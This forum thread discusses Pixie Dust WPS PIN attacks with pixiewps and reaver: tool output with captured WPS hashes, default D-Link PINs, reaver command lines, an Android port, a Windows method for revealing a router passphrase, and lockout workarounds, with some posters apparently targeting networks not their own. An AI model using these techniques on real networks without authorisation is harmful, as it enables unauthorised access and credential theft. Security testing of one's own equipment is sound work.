[+] Sending M2 message
[P] E-Hash1: be:74:91:eb:c3:38:e0:59:7c:e1:de:5c:07:d5:1b:d3:d7 :e6:15:9e:06:09:96:f9:7c:08:4a:84:cc:df:35:0e
[P] E-Hash2: 90:bf:2e:36:f0:65:0e:f6:41:e7:97:f8:71:02:8b:11:92 :c1:89:f1:99:63:2b:fa:01:12:6c:c5:04:b6:ec:cc
[Pixie-Dust]
[Pixie-Dust] Pixiewps 1.1
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust] Time taken: 3 s
[Pixie-Dust]
[Pixie-Dust] [!] The AP /might be/ vulnerable to mode 4. Try again with --force or with another (newer) set of data.
[Pixie-Dust]


So I ran pixiewps seperately instead of reaver and it is giving me a strange error :

[!] Bad enrollee public key -- d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:

I don't know what it means.
I hope you'd shed some light on that and help.... :)

First, you can not use -S in your reaver command for Realtek devices. Nobody really knows why but somehow it stops pixiewps from recovering the pin.

Second, the RTL8671 chip is strange. It seems to use a different RNG or something. I know a few people are looking into it though :)

--I've also noticed that your nonce doesn't follow the 00:00:XX:XX:00:00:XX:XX pattern seen in other RTL8671 chips... hmmm. Would you be able to send me a cap containing a few WPS exchanges?

As for the Bad enrollee key, its probably just a space somewhere in your syntax that is screwing it up. Actually I just found it:


d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63


Try this instead (you'll probably have to do this for every piece of data)


d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63


Welcome to the forums by the way :cool:

DetmL
2015-06-18, 16:16
Is it A DSL-2730U/DSL-2750U?

kcdtv
2015-06-19, 14:49
Hi DetmL
For the two models you speak about we could gathered generic PIN ( cf WPSPIN > Générateur PIN WPS par défaut routeurs Huawei, Belkin ... (http://www.crack-wifi.com/forum/topic-8793-wpspin-generateur-pin-wps-par-defaut-routeurs-huawei-belkin-page-3.html#p68134))

DSL-2730U > 20172527
DSL-2750U > 21464065

If there is a common PIN we already now that we deal with a "weak" WPS implementation and so there is hope... it could be "pixie dusted" somehow...
If you have one of this models could you please send to soxrok2212 / wiire (or you can send it to me and i wil share with them) a *.cap file with the reaver 1.5.2 stdout?
Maybe if that is not asking too much you can add some screenshot /copy-paste from the administration interface with Wifi-WPS security parameter and information about device ?
Thanks in advance

phoenix!
2015-06-21, 06:46
@soxrok2212

Firstly, I apologize for late reply.I have got exams, last few days have been pretty intense.

1) I tried without --dh-small-keys, but no luck
Still WPS pin not found.

2) I've mailed to your old email-id the reaver outputs.

3) yea and the spaces between enrollee key :|
tried pixiewps with correct syntax but no luck :(
It says AP might be vulnerable try bruteforcing.
Tried with --force couple of times but pin not found their either.


@DetmL

It is D-link DSL-2750U rev U1

Wikidevi link: https://wikidevi.com/wiki/D-Link_DSL-2750U_rev_U1

DetmL
2015-06-21, 15:34
@DetmL

It is D-link DSL-2750U rev U1

Wikidevi link: https://wikidevi.com/wiki/D-Link_DSL-2750U_rev_U1

For some unknown reason, reaver is unable to retrive the wpa2 passphrase of DSL-2730U and DSL-2750U although the default PIN is 12345670. However, Dumpper can retrive the passphrase. :confused:

DetmL
2015-06-21, 15:37
@Kcdtv
Sorry for the confusion. I don't have either of the device.

phoenix!
2015-06-22, 04:48
For some unknown reason, reaver is unable to retrive the wpa2 passphrase of DSL-2730U and DSL-2750U although the default PIN is 12345670. However, Dumpper can retrive the passphrase. :confused:

What do you mean? Default pin is 12345670? I checked with Dumpper and it couldn't find the passphrase with 12345670 as pin.

phoenix!
2015-06-22, 04:51
Hi DetmL
For the two models you speak about we could gathered generic PIN ( cf WPSPIN > Générateur PIN WPS par défaut routeurs Huawei, Belkin ... (http://www.crack-wifi.com/forum/topic-8793-wpspin-generateur-pin-wps-par-defaut-routeurs-huawei-belkin-page-3.html#p68134))

DSL-2730U > 20172527
DSL-2750U > 21464065

If there is a common PIN we already now that we deal with a "weak" WPS implementation and so there is hope... it could be "pixie dusted" somehow...
If you have one of this models could you please send to soxrok2212 / wiire (or you can send it to me and i wil share with them) a *.cap file with the reaver 1.5.2 stdout?
Maybe if that is not asking too much you can add some screenshot /copy-paste from the administration interface with Wifi-WPS security parameter and information about device ?
Thanks in advance

Hi kcdtv,
I can send you the pcap files to your email,if you wish.
cannot upload pcap filese in here.

bora
2015-06-27, 15:18
I run
sudo reaver -i mon0 -vvv -K 1 -b 02:26:4D:AA:XX:XX
but I never get M3 message (e-hash1 and e-hash2). I tried with several routers and the output from reaver never contains hash1 or hash2.
Any ideas what is wrong?
I configured the router for WPS. It is based on Ralink RT2860. Signal is good (1m distance).

I use a laptop with Intel Centrino Wifi N card and reaver 1.5.2 from github mod by t6_x .

undersc0re
2015-06-28, 06:10
I run
sudo reaver -i mon0 -vvv -K 1 -b 02:26:4D:AA:XX:XX
but I never get M3 message (e-hash1 and e-hash2). I tried with several routers and the output from reaver never contains hash1 or hash2.
Any ideas what is wrong?
I configured the router for WPS. It is based on Ralink RT2860. Signal is good (1m distance).

I use a laptop with Intel Centrino Wifi N card and reaver 1.5.2 from github mod by t6_x .

The wireless card probably does not support injection.

bora
2015-06-28, 12:22
It is unreliable, but I think injection works:

sudo aireplay-ng -9 mon0
14:00:37 Trying broadcast probe requests...
14:00:37 Injection is working!
.........
14:00:39 Trying directed probe requests...
14:00:39 84:9C:A6:A7:22:22 - channel: 2 - 'o2-WLAN25'
14:00:39 Ping (min/avg/max): 0.978ms/5.656ms/47.815ms Power: -49.97
14:00:39 30/30: 100%

14:00:39 02:23:08:F9:33:11 - channel: 1 - 'EasyBox-C54211'
14:00:40 Ping (min/avg/max): 0.926ms/7.952ms/44.700ms Power: -43.68
14:00:40 28/30: 93%

kcdtv
2015-06-29, 09:24
Hi kcdtv,
I can send you the pcap files to your email,if you wish.
cannot upload pcap filese in here.
Sorry i didn't see your message.
For sure; thank you very much! I send you a mp with my mail.
@ bora.
This is not really a "pixie dust issue" if you don't get a M3... It is an issue for the pixie dust attack but the problem is about how the WPS flow is done.
And more information would be needed to be able to guess where the problem can come from.

It is unreliable, but I think injection works:
Don't worry : It is relliable if areplay-ng -9 works; your card can inject.

coachella
2015-06-29, 21:59
I run
sudo reaver -i mon0 -vvv -K 1 -b 02:26:4D:AA:XX:XX
but I never get M3 message (e-hash1 and e-hash2). I tried with several routers and the output from reaver never contains hash1 or hash2.
Any ideas what is wrong?
I configured the router for WPS. It is based on Ralink RT2860. Signal is good (1m distance).

I use a laptop with Intel Centrino Wifi N card and reaver 1.5.2 from github mod by t6_x .

I have the same problem. Using a 2011 MBP with broadcom drivers.
Any help would be appreciated.

Thanks!

kcdtv
2015-06-30, 12:45
It is not that people don't want to help you but your questions are "offtopic."
It could be an issue with reaver, with your card, with your system configuration or with the access point... etc.
But for sure it has nothing to do with pixiewps : pixiewps needs that you collect the needed strings properly or ti cannot make the brute force of the M3.
How to get the M3 to brute force it with it "authkey" is another question, another subject
Cheers

wiire
2015-07-03, 12:23
Just a quick update on the state of the 'project'.

I'm really busy at the moment. I'll update/fix pixiewps when I'll be back (2-3 weeks), with (hopefully) some news.

g0tmi1k
2015-07-04, 07:20
Best of luck!
Looking forward to it.

neo45215
2015-07-26, 14:51
hi i wanted help reagrding an Dlink DSL 2750u router i was testing with RTL8167 chipset with pixiewps.any updates on the issue?

wiire
2015-08-05, 18:50
We are still looking into RTL816x chipset. We have have some information about how the nonce might be 'built'. However it's still not enough to implement a feasible bruteforce.

NotieBoie
2015-08-06, 15:08
Nice work indeed,tried this today on DIR-605L and worked like a charm even with bad signals ( AP is too very away), WPS trans failed for a few times and then voila.
PIN was not default and start with 4,normal WPS attack vector would never have found it coz of lockout

I think WPS attack is not possible for NETGEAR? tried with two different AP but no luck.
I got lot of APS if u want me to test something new.

neo45215
2015-08-07, 14:22
We are still looking into RTL816x chipset. We have have some information about how the nonce might be 'built'. However it's still not enough to implement a feasible bruteforce.
Thanks,waiting for it..also I would like to share some data regarding some vulnerable routers and chipsets (about 6 ;) ) ,where can I submit the data?

soxrok2212
2015-08-07, 18:51
Thanks,waiting for it..also I would like to share some data regarding some vulnerable routers and chipsets (about 6 ;) ) ,where can I submit the data?

Contact me on skype [skype removed for obvious reasons] and I'll add it to the database :)

neo45215
2015-08-08, 14:28
Contact me on skype [skype removed for obvious reasons] and I'll add it to the database :)
Will get back to you after I finish my shift, got your contact.
Also,off topic,where can I get help regarding Kali nethunter on nexus 7 nakasig?
Regarding reaver and pixie support tho

aanarchyy
2015-08-21, 03:26
Ported to Android.

https://github.com/aanarchyy/pixiewps-android

Binaries to pixiewps and reaver-t6x.

http://www.mediafire.com/download/bwrwn4i1c8p5881/reaver-pixie-android.tar.gz

phoenix!
2015-08-23, 05:17
Ported to Android.

https://github.com/aanarchyy/pixiewps-android

Binaries to pixiewps and reaver-t6x.

http://www.mediafire.com/download/bwrwn4i1c8p5881/reaver-pixie-android.tar.gz

Cool:cool: Works with broadcom chipset natively?


Also any news on RTL816x chipset, yet?

kcdtv
2015-08-23, 14:19
Nice job aanarchy!

aanarchyy
2015-08-24, 01:04
Nice job aanarchy!

Thanks :-D

I have confirmed the pixiewps port does work, but i have yet to confirm the reaver port works, and i have very little time to do so, if someone would be able to test this, it would help.

aanarchyy
2015-08-28, 00:20
I have confirmed the t6x_reaver port does work, little bit of segault action going on, but it has about a %70 success rate for me, but that may be hardware related... TESTERS APPRECIATED!!!!
I have agreed with the developers to not release an APK.

Prerequisites:
Install both linked binaries(reaver and pixiewps) in the path(eg copy to /system/xbin)
Have a working copy of bcmon on device.

How I got it working:
Enable monitor mode though the bcmon app.
Open shell in a terminal emulator on device.
Obtian root in shell.
Load the bcmon wrapper

LD_PRELOAD=/data/data/com.bcmon.bcmon/files/libs/libfake_driver.so sh
Then run reaver as normal...

reaver -i wlan0 -b <target> -K1 -P -vvv

blackdream
2015-09-16, 13:08
Hello Guys,

I have tried pixiewps 1.1 on Kali 2.0. I have found Pxiewps does not work with Realtek RTL8671 chipset. i have tried with -V 3 -f 4 option but no luck.

Has anyone faced the issue for chipset Realtek RTL8671?

Thanks in advance.

soxrok2212
2015-09-16, 13:35
Yes, it is a known problem. RTL8671 is a SoC (System on Chip) and its seems that their number generation is a bit different than their other chips.

blackdream
2015-09-16, 13:59
Thank you for the information.

blackdream
2015-10-02, 15:47
Hi soxrok2212 !

Today, i have found the tool created by SlientGhost. https://github.com/SilentGhostX/HT-WPS-Breaker. It does working for RTL8671 with Model number 2010 as per given screen shot in the URL. When i tried with RTL8671 model number 2006. it seems to be not working with model 2006.

jenisbob
2015-10-03, 04:01
3 hours...?

I can give it a go if you want. It takes at most 20 minutes on my PC. Send me your data via email or post it here. Of course I assume the router you're testing is yours.

Dear Wiire,
i am not getting error : Pixiewps not getting Hash File

I only get E-Nounce PKE R-Nounce PKR and AUthkey only no hash

please guide me further guidance so that i can crack pins and passphrase

Thanks in advance
jenisbob

jenisbob
2015-10-03, 05:32
Hi soxrok2212 !

Today, i have found the tool created by SlientGhost. https://github.com/SilentGhostX/HT-WPS-Breaker. It does working for RTL8671 with Model number 2010 as per given screen shot in the URL. When i tried with RTL8671 model number 2006. it seems to be not working with model 2006.

I am not getting hash code .......please check my attached picture and please guide me further details ...906

jenisbob
2015-10-06, 11:45
I am using HT-WPS Breaker By Silent Ghost X

Chipset : Realtek RTL8671


WPS Manufacturer: Wireless Router

WPSModel Name: RTL8671
WPS Model Number: EV-2006-07-27

Access Point Serial Number: 123456789012347
Needed Information as below:
Trying pin 12345670.
I m waiting for 3 hours and getting Sorry pin not found , good luck next time...


Veterans please guide further guidance...
Thanks in advance

jenisbob

921
922

soxrok2212
2015-10-08, 03:12
I am using HT-WPS Breaker By Silent Ghost X

Chipset : Realtek RTL8671


WPS Manufacturer: Wireless Router

WPSModel Name: RTL8671
WPS Model Number: EV-2006-07-27

Access Point Serial Number: 123456789012347
Needed Information as below:
Trying pin 12345670.
I m waiting for 3 hours and getting Sorry pin not found , good luck next time...


Veterans please guide further guidance...
Thanks in advance

jenisbob

921
922

RTL8671 is currently not vulnerable. Sorry.

jenisbob
2015-10-09, 14:31
RTL8671 is currently not vulnerable. Sorry.

Dear soxrok2212 ,
thanks for quick response..
Again i am not getting wps pin on TP-link Router ..please check attached picture.931

kcdtv
2015-10-09, 17:22
There is no support for atheros chipsets and all the versions of this access point have a chipset manufactured by atheros...

http://pix.toile-libre.org/upload/original/1444411178.png
TP-LINK TL-WR740N v4.x (https://wikidevi.com/wiki/TP-LINK_TL-WR740N_v4.x)

DetmL
2015-10-11, 03:31
This method works on Windows with D-LINK routers that uses RTL8671.
1) Install jumpstart https://onedrive.live.com/download?resid=74d305ad22809d85%214754
2) Open jumpstart and click "configure a wireless network" click next
3) Enter wps pin 12345670 and unclick "select network automatically" , click next
4) Select the AP with the dlink router and continue.
Jumpstart will connect to the AP. Next you can right click on the connected AP and right click and select "properties". Go to the security tab and click "show characters"
From here you should be able to see the AP's passphrase.

soxrok2212
2015-10-11, 14:46
This method works on Windows with D-LINK routers that uses RTL8671.
1) Install jumpstart https://onedrive.live.com/download?resid=74d305ad22809d85%214754
2) Open jumpstart and click "configure a wireless network" click next
3) Enter wps pin 12345670 and unclick "select network automatically" , click next
4) Select the AP with the dlink router and continue.
Jumpstart will connect to the AP. Next you can right click on the connected AP and right click and select "properties". Go to the security tab and click "show characters"
From here you should be able to see the AP's passphrase.

So basically D-Link devices just use 12345670?

Kaushalrocks
2015-10-11, 15:49
Is this pin works for all dlink router with RTL8671 hardware??

undersc0re
2015-10-11, 23:24
You might want to be carefull installing that, even if it works as advertised.
http://www.securityweek.com/d-link-accidentally-publishes-private-keys-online
I am overly paronoid of these things though, its probably fine.

DetmL
2015-10-12, 00:37
So basically D-Link devices just use 12345670?
Not all Dlink uses RTL8671. From what I have tested, DSL 2750U pixiewps outputs 12345670 as PIN but reaver is unable to retrieve the passphrase using this pin. However jumpstart is able to retrieve the passphrase using that PIN in Windows. I can confirm that this PIN doesn't work on DIR devices but confirmed working on DSL 2730U & DSL 2750U. I have not tested it on other Dlink DSL routers.

kcdtv
2015-10-12, 09:32
jumpstat doesn't do anything special.
Try to add -n to yor reaver line, you should recover the wpa key.
Otherwise use wpa_cli to connect "normaly" through WPS,
That the normal way to use WPS in Linux.

rho
2015-10-30, 12:28
Hi..
Fiirst, Thankyou everyone for the resources available & efforts put up to understand security protocols wrt WPS

Ive been a long time believer of convenience with technology, and Believed WPS helps us achieve just that. However, my secure bubble just burst, when i stumbled upon this thread.
For the longest time, Ive been using, and encouraged everyone to use WPS claiming PSK is so 19th century.. not any more, as ive managed to hack my own as well as wifi setups of my friends and family.

Second :
Im unable to post the log of PixieWps / rever..
im stuck on this everytime I attempt posting something

Sucuri WebSite Firewall - CloudProxy - Access Denied
What is going on?
You are not allowed to access the requested page. If you are the site owner, please open a ticket in our support page if you think it was caused by an error: https://support.sucuri.net. If you are not the owner of the web site, you can contact us at [email protected]. Also make sure to include the block details (displayed below), so we can better troubleshoot the error.
Block details
Your IP: 2.49.9.75
URL: forums.kali.org/newreply.php?do=postreply&t=25018
Your Browser: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
Block ID: EXPVP5
Block reason: Not identified.
Time: Fri, 30 Oct 2015 08:23:07 -0400
Server ID: cp13012
Sucuri CloudProxy
CloudProxy is a WebSite Firewall from Sucuri. It stands between your site and the rest of the world and protects against attacks, malware infections, DDOS, brute force attempts and mostly anything that can harm it.

Not only that, but your sites get cached, speeding it up quite a bit. Interested? Visit http://cloudproxy.sucuri.net

rho
2015-10-30, 12:33
So following that post..
I have a question..

Does the PKR value of the same AP change ?

My work network is Cisco Linksys E900 v1 FW: 1.0.0.0
on bruting it, it locks up on every 9 successful incorrect pins for 60 seconds and then for 10 seconds or so for every 3 incorrect pins.. and the cycle continues.
Its non-exponential.

Howwver, the strange bit is : its PKR value has changed two times.
First time it was some huge BE:3f:4c.......
Second time it was something else.. cant rem:
Now its 00:00:00:00:00:00:...............:00:00:00:02 (all zeroes and last digit 2)

Im using the -vvv with reaver.. and trying to manually input values in PD. so this caught my attention.
Again im unable to post the log(s).. as sucuri website firewall doesnt allow me to.

soxrok2212
2015-10-31, 15:47
So following that post..
I have a question..

Does the PKR value of the same AP change ?

My work network is Cisco Linksys E900 v1 FW: 1.0.0.0
on bruting it, it locks up on every 9 successful incorrect pins for 60 seconds and then for 10 seconds or so for every 3 incorrect pins.. and the cycle continues.
Its non-exponential.

Howwver, the strange bit is : its PKR value has changed two times.
First time it was some huge BE:3f:4c.......
Second time it was something else.. cant rem:
Now its 00:00:00:00:00:00:...............:00:00:00:02 (all zeroes and last digit 2)

Im using the -vvv with reaver.. and trying to manually input values in PD. so this caught my attention.
Again im unable to post the log(s).. as sucuri website firewall doesnt allow me to.

The specification may seem backwards, but upon understanding how the whole thing works, the registrar is the entity looking to join the network (YOU) and the enrollee is the AP.

That being said, you as the attacker (or device looking to join) are generating the PKR. If you use -S in Reaver (small DH Keys), then Reaver will generate a PKR with a value of 00:00:00:00.....:00:00:00:02. I generally try to avoid using -S when pixie dusting now (and it WILL NOT even work with Realtek access points) so unless you are running a standard Reaver attack, there is no need for it. Otherwise, Reaver will select a random private number and will generate a random PKR value like the first time you tried.

Also note that your router, Linksys E900, uses a Broadcom BCM5357C0 wireless chip which is not currently vulnerable to pixiewps: https://wikidevi.com/wiki/Linksys_E900

mmusket33
2015-11-01, 00:29
The following comments are more clerical then technical:

If you are doing a brute force reaver attack testing all 11,000 pins and NOT using -S in the command line(CL) and then wish to either:

1. Add the -S --dh-small to the command line
or
2. Wish to test a specific pin by adding --pin= to the reaver CL.

Suggest you also add the --session=?filename? to the reaver CL.

This will keep these different attack types separated. If either the -S or --pin= test does not work you can return to your brute force without loosing your pin count collected during the brute force sessions.

To return to testing all 11,000 pins just remove the --session= entry in the CL and reaver will continue the brute force attack from where you stopped.

MTeams

rho
2015-11-01, 20:33
Oh, ok.. lol
Got mixed up with the PKR and PKE.
Thankyou for clearing it.

@ Mteam,
will try that next.

wiire
2015-11-22, 22:57
Hi,
I'm currently testing some features I've introduced in pixiewps however I still have some troubles with some.

I wanted to ask if some of you has a Ralink device and can get me some data. I'd need data from at least 2 consecutive WPS transactions/sessions.

The data should include PKe, PKr, Enrollee nonce, Registrar nonce, Authkey, Enrollee BSSID and the two hashes. If you don't want to include the MAC address is fine. It's not strictly necessary for what I'm doing.

If someone is interested can send me an email with the data. Just be sure to include each Authkey if want to send the .cap.

Thank you in advance.

mmusket33
2015-11-23, 09:35
To Wire

Confirm you wish data from the following two(2) vendor mac addresses

00:17:a5

00:0c:43

Is there any chances to a solution for RTL8761

MTeams

soxrok2212
2015-11-23, 15:55
To Wire

Confirm you wish data from the following two(2) vendor mac addresses

00:17:a5

00:0c:43

Is there any chances to a solution for RTL8761

MTeams

Any Ralink device will work.

As for RTL8671, not right now. There are still things that need to be figured out but we haven't got there yet.

Kaushalrocks
2015-11-23, 17:20
When we will get your next new release with more features to bypaas rtl8671??

soxrok2212
2015-11-23, 21:01
When we will get your next new release with more features to bypaas rtl8671??

Nobody said anything about an RTL8671 crack. Nobody knows if it can even be done.

wiire
2015-11-26, 02:32
@mmusket

Thank you offering your help. I already got the data I needed and forgot to check back on the forum. Hopefully won't be too long for the final release.

About RTL867x I (and others) haven't looked anymore into it.

kiarashmm
2015-12-13, 11:30
so guys did you look into RTL8671 for cracking?
I'm trying to crack a router and the log is:
WPS Manufacturer: Realtek Semiconductor Corp.
WPS Model Name: RTL8671
WPS Model Number: EV-2006-07-27
so can it get cracked or what should I do?!!?

DetmL
2015-12-17, 10:24
It seems like RTL8671 is one unique chipset. This is an old thread from reaver days https://code.google.com/p/reaver-wps/issues/detail?id=541

mmusket33
2015-12-17, 11:16
To kiarashmm:

In our areas of operation this chipset is in over half the available targets. And in every case the network locks after ten(10) pin requests and does not respond to pixiedust.

The router can though be cracked with reaver as occasionally one of these networks resets its pin to 12345670 and reaver then easily extracts the WPA key.

If the network does not lock and responds to reaver pin requests then just use reaver in a command line.

If the pins climb to 99,99% and spin the router may have reset its pin to 12345670 during the attack so just add --pin=12345670 to your command line or start a new brute force attack.

If the routers WPS system locks then a automated process like that found in varmacscan2.8 is the tool of choice in this case. There may be other tools we are just not aware of them

MTeams

kiarashmm
2015-12-17, 19:18
To kiarashmm:

In our areas of operation this chipset is in over half the available targets. And in every case the network locks after ten(10) pin requests and does not respond to pixiedust.

The router can though be cracked with reaver as occasionally one of these networks resets its pin to 12345670 and reaver then easily extracts the WPA key.

If the network does not lock and responds to reaver pin requests then just use reaver in a command line.

If the pins climb to 99,99% and spin the router may have reset its pin to 12345670 during the attack so just add --pin=12345670 to your command line or start a new brute force attack.

If the routers WPS system locks then a automated process like that found in varmacscan2.8 is the tool of choice in this case. There may be other tools we are just not aware of them

MTeams
Thanks for replying dude. I did what you said... I started a normal wps attack it started from 90% and stucked at 99.99...after that i tried --pin=12345670 and failure again.
so what should I do now?
give up?
Thanks for repliying dud

motionindo
2015-12-29, 20:21
i get this from the 1st post i think, I'm a total noob in Linux please someone teach me how to do this from the command windows.
Dependencies: PLEASE make sure you are up to date with these or your install WILL fail!
Code:
apt-get install libpcap-dev
apt-get install libsqlite3-dev
DONE

Tools:
-Pixiewps by Wiire, used to brute force the WPS pin offline https://github.com/wiire/pixiewps https://github.com/wiire/pixiewps.git
-Original thread
Code:
cd /path/to/pixiewps/src <<< this part i do not understand i downloaded it and it's in my Download folder, what do I type in command line? and where to move i'm totally blank pls help
make
make install

-t6_x's modified version of Reaver to automate the process https://github.com/t6x/reaver-wps-fork-t6x https://github.com/t6x/reaver-wps-fork-t6x.git
-Original thread
Code:
cd /path/to/reaver-wps-fork-t6x/src <<< this part i do not understand i downloaded it and it's in my Download folder, what do I type in command line? and where to move i'm totally blank pls help
chmod 777 ./configure
./configure
make
make install

aanarchyy
2015-12-29, 23:15
Firstly you will need to extract the archives, should be a simple right click, extract here.

Just open the folder in whatever file manager, right click in a blank space in the file manager, and there should be a "Open terminal here" option(or something to that nature).
then type that stuff in.

soxrok2212
2015-12-30, 00:27
i get this from the 1st post i think, I'm a total noob in Linux please someone teach me how to do this from the command windows.
Dependencies: PLEASE make sure you are up to date with these or your install WILL fail!
Code:
apt-get install libpcap-dev
apt-get install libsqlite3-dev
DONE

Tools:
-Pixiewps by Wiire, used to brute force the WPS pin offline https://github.com/wiire/pixiewps https://github.com/wiire/pixiewps.git
-Original thread
Code:
cd /path/to/pixiewps/src <<< this part i do not understand i downloaded it and it's in my Download folder, what do I type in command line? and where to move i'm totally blank pls help
make
make install

-t6_x's modified version of Reaver to automate the process https://github.com/t6x/reaver-wps-fork-t6x https://github.com/t6x/reaver-wps-fork-t6x.git
-Original thread
Code:
cd /path/to/reaver-wps-fork-t6x/src <<< this part i do not understand i downloaded it and it's in my Download folder, what do I type in command line? and where to move i'm totally blank pls help
chmod 777 ./configure
./configure
make
make install

Sorry to say this bud, but if you can't figure that out then you definitely should NOT be screwing with wireless networks. That's how you get in trouble.

motionindo
2015-12-30, 10:12
Firstly you will need to extract the archives, should be a simple right click, extract here.

Just open the folder in whatever file manager, right click in a blank space in the file manager, and there should be a "Open terminal here" option(or something to that nature).
then type that stuff in.

Thank you for your reply aanarchyy,
"Firstly you will need to extract the archives, should be a simple right click, extract here." the downloaded pixiewps is in the Download folder do you mean I extract it in the download folder? or do I have to move it to other folder then extract it?

Thanks in advance

motionindo
2015-12-30, 10:17
Sorry to say this bud, but if you can't figure that out then you definitely should NOT be screwing with wireless networks. That's how you get in trouble.

soxrok2212, I'm sorry maybe i'm in the wrong room but I want to learn this kind of stuff, but I'm a total noob in linux with the command line, so can you please tell me which thread or forum I should start my journey in learning Kali Linux? Btw i have read all the docs in kali some i understand and some don't because they don't explain step by step.

thanks

kcdtv
2015-12-30, 14:13
It is a good idea to start your journey by installing a "normal" linux distribution before you jump in the world of pentesting with Kali linux
I recommend you Xubuntu/Ubuntu or linux mint, there also based on debian, like kali linux
They are well documented and you will find answers to every beginner questions.

cd /path/to/pixiewps/src <<< this part i do not understand i downloaded it and it's in my Download folder, what do I type in command line? and where to move i'm totally blank pls help

do you mean I extract it in the download folder? or do I have to move it to other folder then extract it?
About "cd" and directories
http://askubuntu.com/questions/232442/how-do-i-navigate-between-directories-in-terminal
It doesn't mater where you extract it, what matters is to have the terminal opened in the correct directory to launch installation : the directory src that you obtain after decompressing the package.

start by using linux and everything will flow naturally ;)

motionindo
2015-12-31, 10:30
I think I managed to install the modified reaver can anyone take a look if I do it correctly?
root@kali:~/Downloads/reaver-wps-fork-t6x-master/src# chmod 777 ./configure
root@kali:~/Downloads/reaver-wps-fork-t6x-master/src# ./configure
checking for gcc... gcc
checking whether the C compiler works... yes
checking for C compiler default output file name... a.out
checking for suffix of executables...
checking whether we are cross compiling... no
checking for suffix of object files... o
checking whether we are using the GNU C compiler... yes
checking whether gcc accepts -g... yes
checking for gcc option to accept ISO C89... none needed
checking for pcap_open_live in -lpcap... yes
checking for sqlite3_open in -lsqlite3... yes
checking how to run the C preprocessor... gcc -E
checking for grep that handles long lines and -e... /bin/grep
checking for egrep... /bin/grep -E
checking for ANSI C header files... yes
checking for sys/types.h... yes
checking for sys/stat.h... yes
checking for stdlib.h... yes
checking for string.h... yes
checking for memory.h... yes
checking for strings.h... yes
checking for inttypes.h... yes
checking for stdint.h... yes
checking for unistd.h... yes
checking for stdlib.h... (cached) yes
checking for stdint.h... (cached) yes
checking for string.h... (cached) yes
checking pcap.h usability... yes
checking pcap.h presence... yes
checking for pcap.h... yes
checking sqlite3.h usability... yes
checking sqlite3.h presence... yes
checking for sqlite3.h... yes
configure: creating ./config.status
config.status: creating Makefile

soxrok2212
2015-12-31, 14:57
I think I managed to install the modified reaver can anyone take a look if I do it correctly?
root@kali:~/Downloads/reaver-wps-fork-t6x-master/src# chmod 777 ./configure
root@kali:~/Downloads/reaver-wps-fork-t6x-master/src# ./configure
checking for gcc... gcc
checking whether the C compiler works... yes
checking for C compiler default output file name... a.out
checking for suffix of executables...
checking whether we are cross compiling... no
checking for suffix of object files... o
checking whether we are using the GNU C compiler... yes
checking whether gcc accepts -g... yes
checking for gcc option to accept ISO C89... none needed
checking for pcap_open_live in -lpcap... yes
checking for sqlite3_open in -lsqlite3... yes
checking how to run the C preprocessor... gcc -E
checking for grep that handles long lines and -e... /bin/grep
checking for egrep... /bin/grep -E
checking for ANSI C header files... yes
checking for sys/types.h... yes
checking for sys/stat.h... yes
checking for stdlib.h... yes
checking for string.h... yes
checking for memory.h... yes
checking for strings.h... yes
checking for inttypes.h... yes
checking for stdint.h... yes
checking for unistd.h... yes
checking for stdlib.h... (cached) yes
checking for stdint.h... (cached) yes
checking for string.h... (cached) yes
checking pcap.h usability... yes
checking pcap.h presence... yes
checking for pcap.h... yes
checking sqlite3.h usability... yes
checking sqlite3.h presence... yes
checking for sqlite3.h... yes
configure: creating ./config.status
config.status: creating Makefile

Then


sudo make
sudo make install

wiire
2016-01-05, 14:31
I released version 1.2.2 (https://github.com/wiire/pixiewps/releases/tag/v1.2.2) of pixiewps.

Most of the work was done to clean up the code, support more platforms, remove OpenSSL dependency (finally!) and add more options. This version has been successfully tested under Linux(Debian, Ubuntu), Mac OS X 10.11, Windows (using MinGW), FreeBSD, OpenWrt and Android (as a .bin file).

Version 1.2.2 has an important bugfix (https://github.com/wiire/pixiewps/issues/21) for FreeBSD users (found in 1.2.1).

I also include two more PRNG/algorithms for eCos devices (through --mode 4,5). I don't know if they are even used, but there is the concrete possibility.

kcdtv
2016-01-13, 17:45
Thank you wiire for this nice surprise to start the new year!
I am pretty sure that the Realteck brute froce option goes much faster than before , at least with my PC.
Great job!
I have some problem with the new options... i was unable to use them correctly :p
That was my idea : I have a router with factory settings from august 2012 and that is the seed used
So I wanted to make a "reverse" brute force from august 2012 to a date in 2015
I tried many sintaxis and got something like

[!] Bad starting point --

[!] Bad ending point --

[!] unknown options
This is the kind of sintaxis i used

(strings --force)* --mode 3 --start [08/]2012 --end [12/]2015

(strings --force)* --mode 3 --start 082012 --end 122015
* The basic command is correct as i can recover the PIN with the "normal brute force" ( 3minute to go back to august 2012, for me it is definitely faster now than with pixiedust 1.1 ;) )
English is not my first language so I can be easly lost for stupid "details" and obvious stuff so sorry if my question is "stupid" but... i don't get it :D

wiire
2016-01-14, 11:24
From December 2015 to August 2012 would be (it's not correct, please continue reading): --start 12/2015 --end 08/2012

In CLI programs square parenthesis usually denote some optional parameters/arguments '[...]'. When I write [mm/]yyyy I mean you can write directly a year in the yyyy form, say 2015, or specify year and month, mm/yyyy (for January would be 01/2015). See the image on my post.

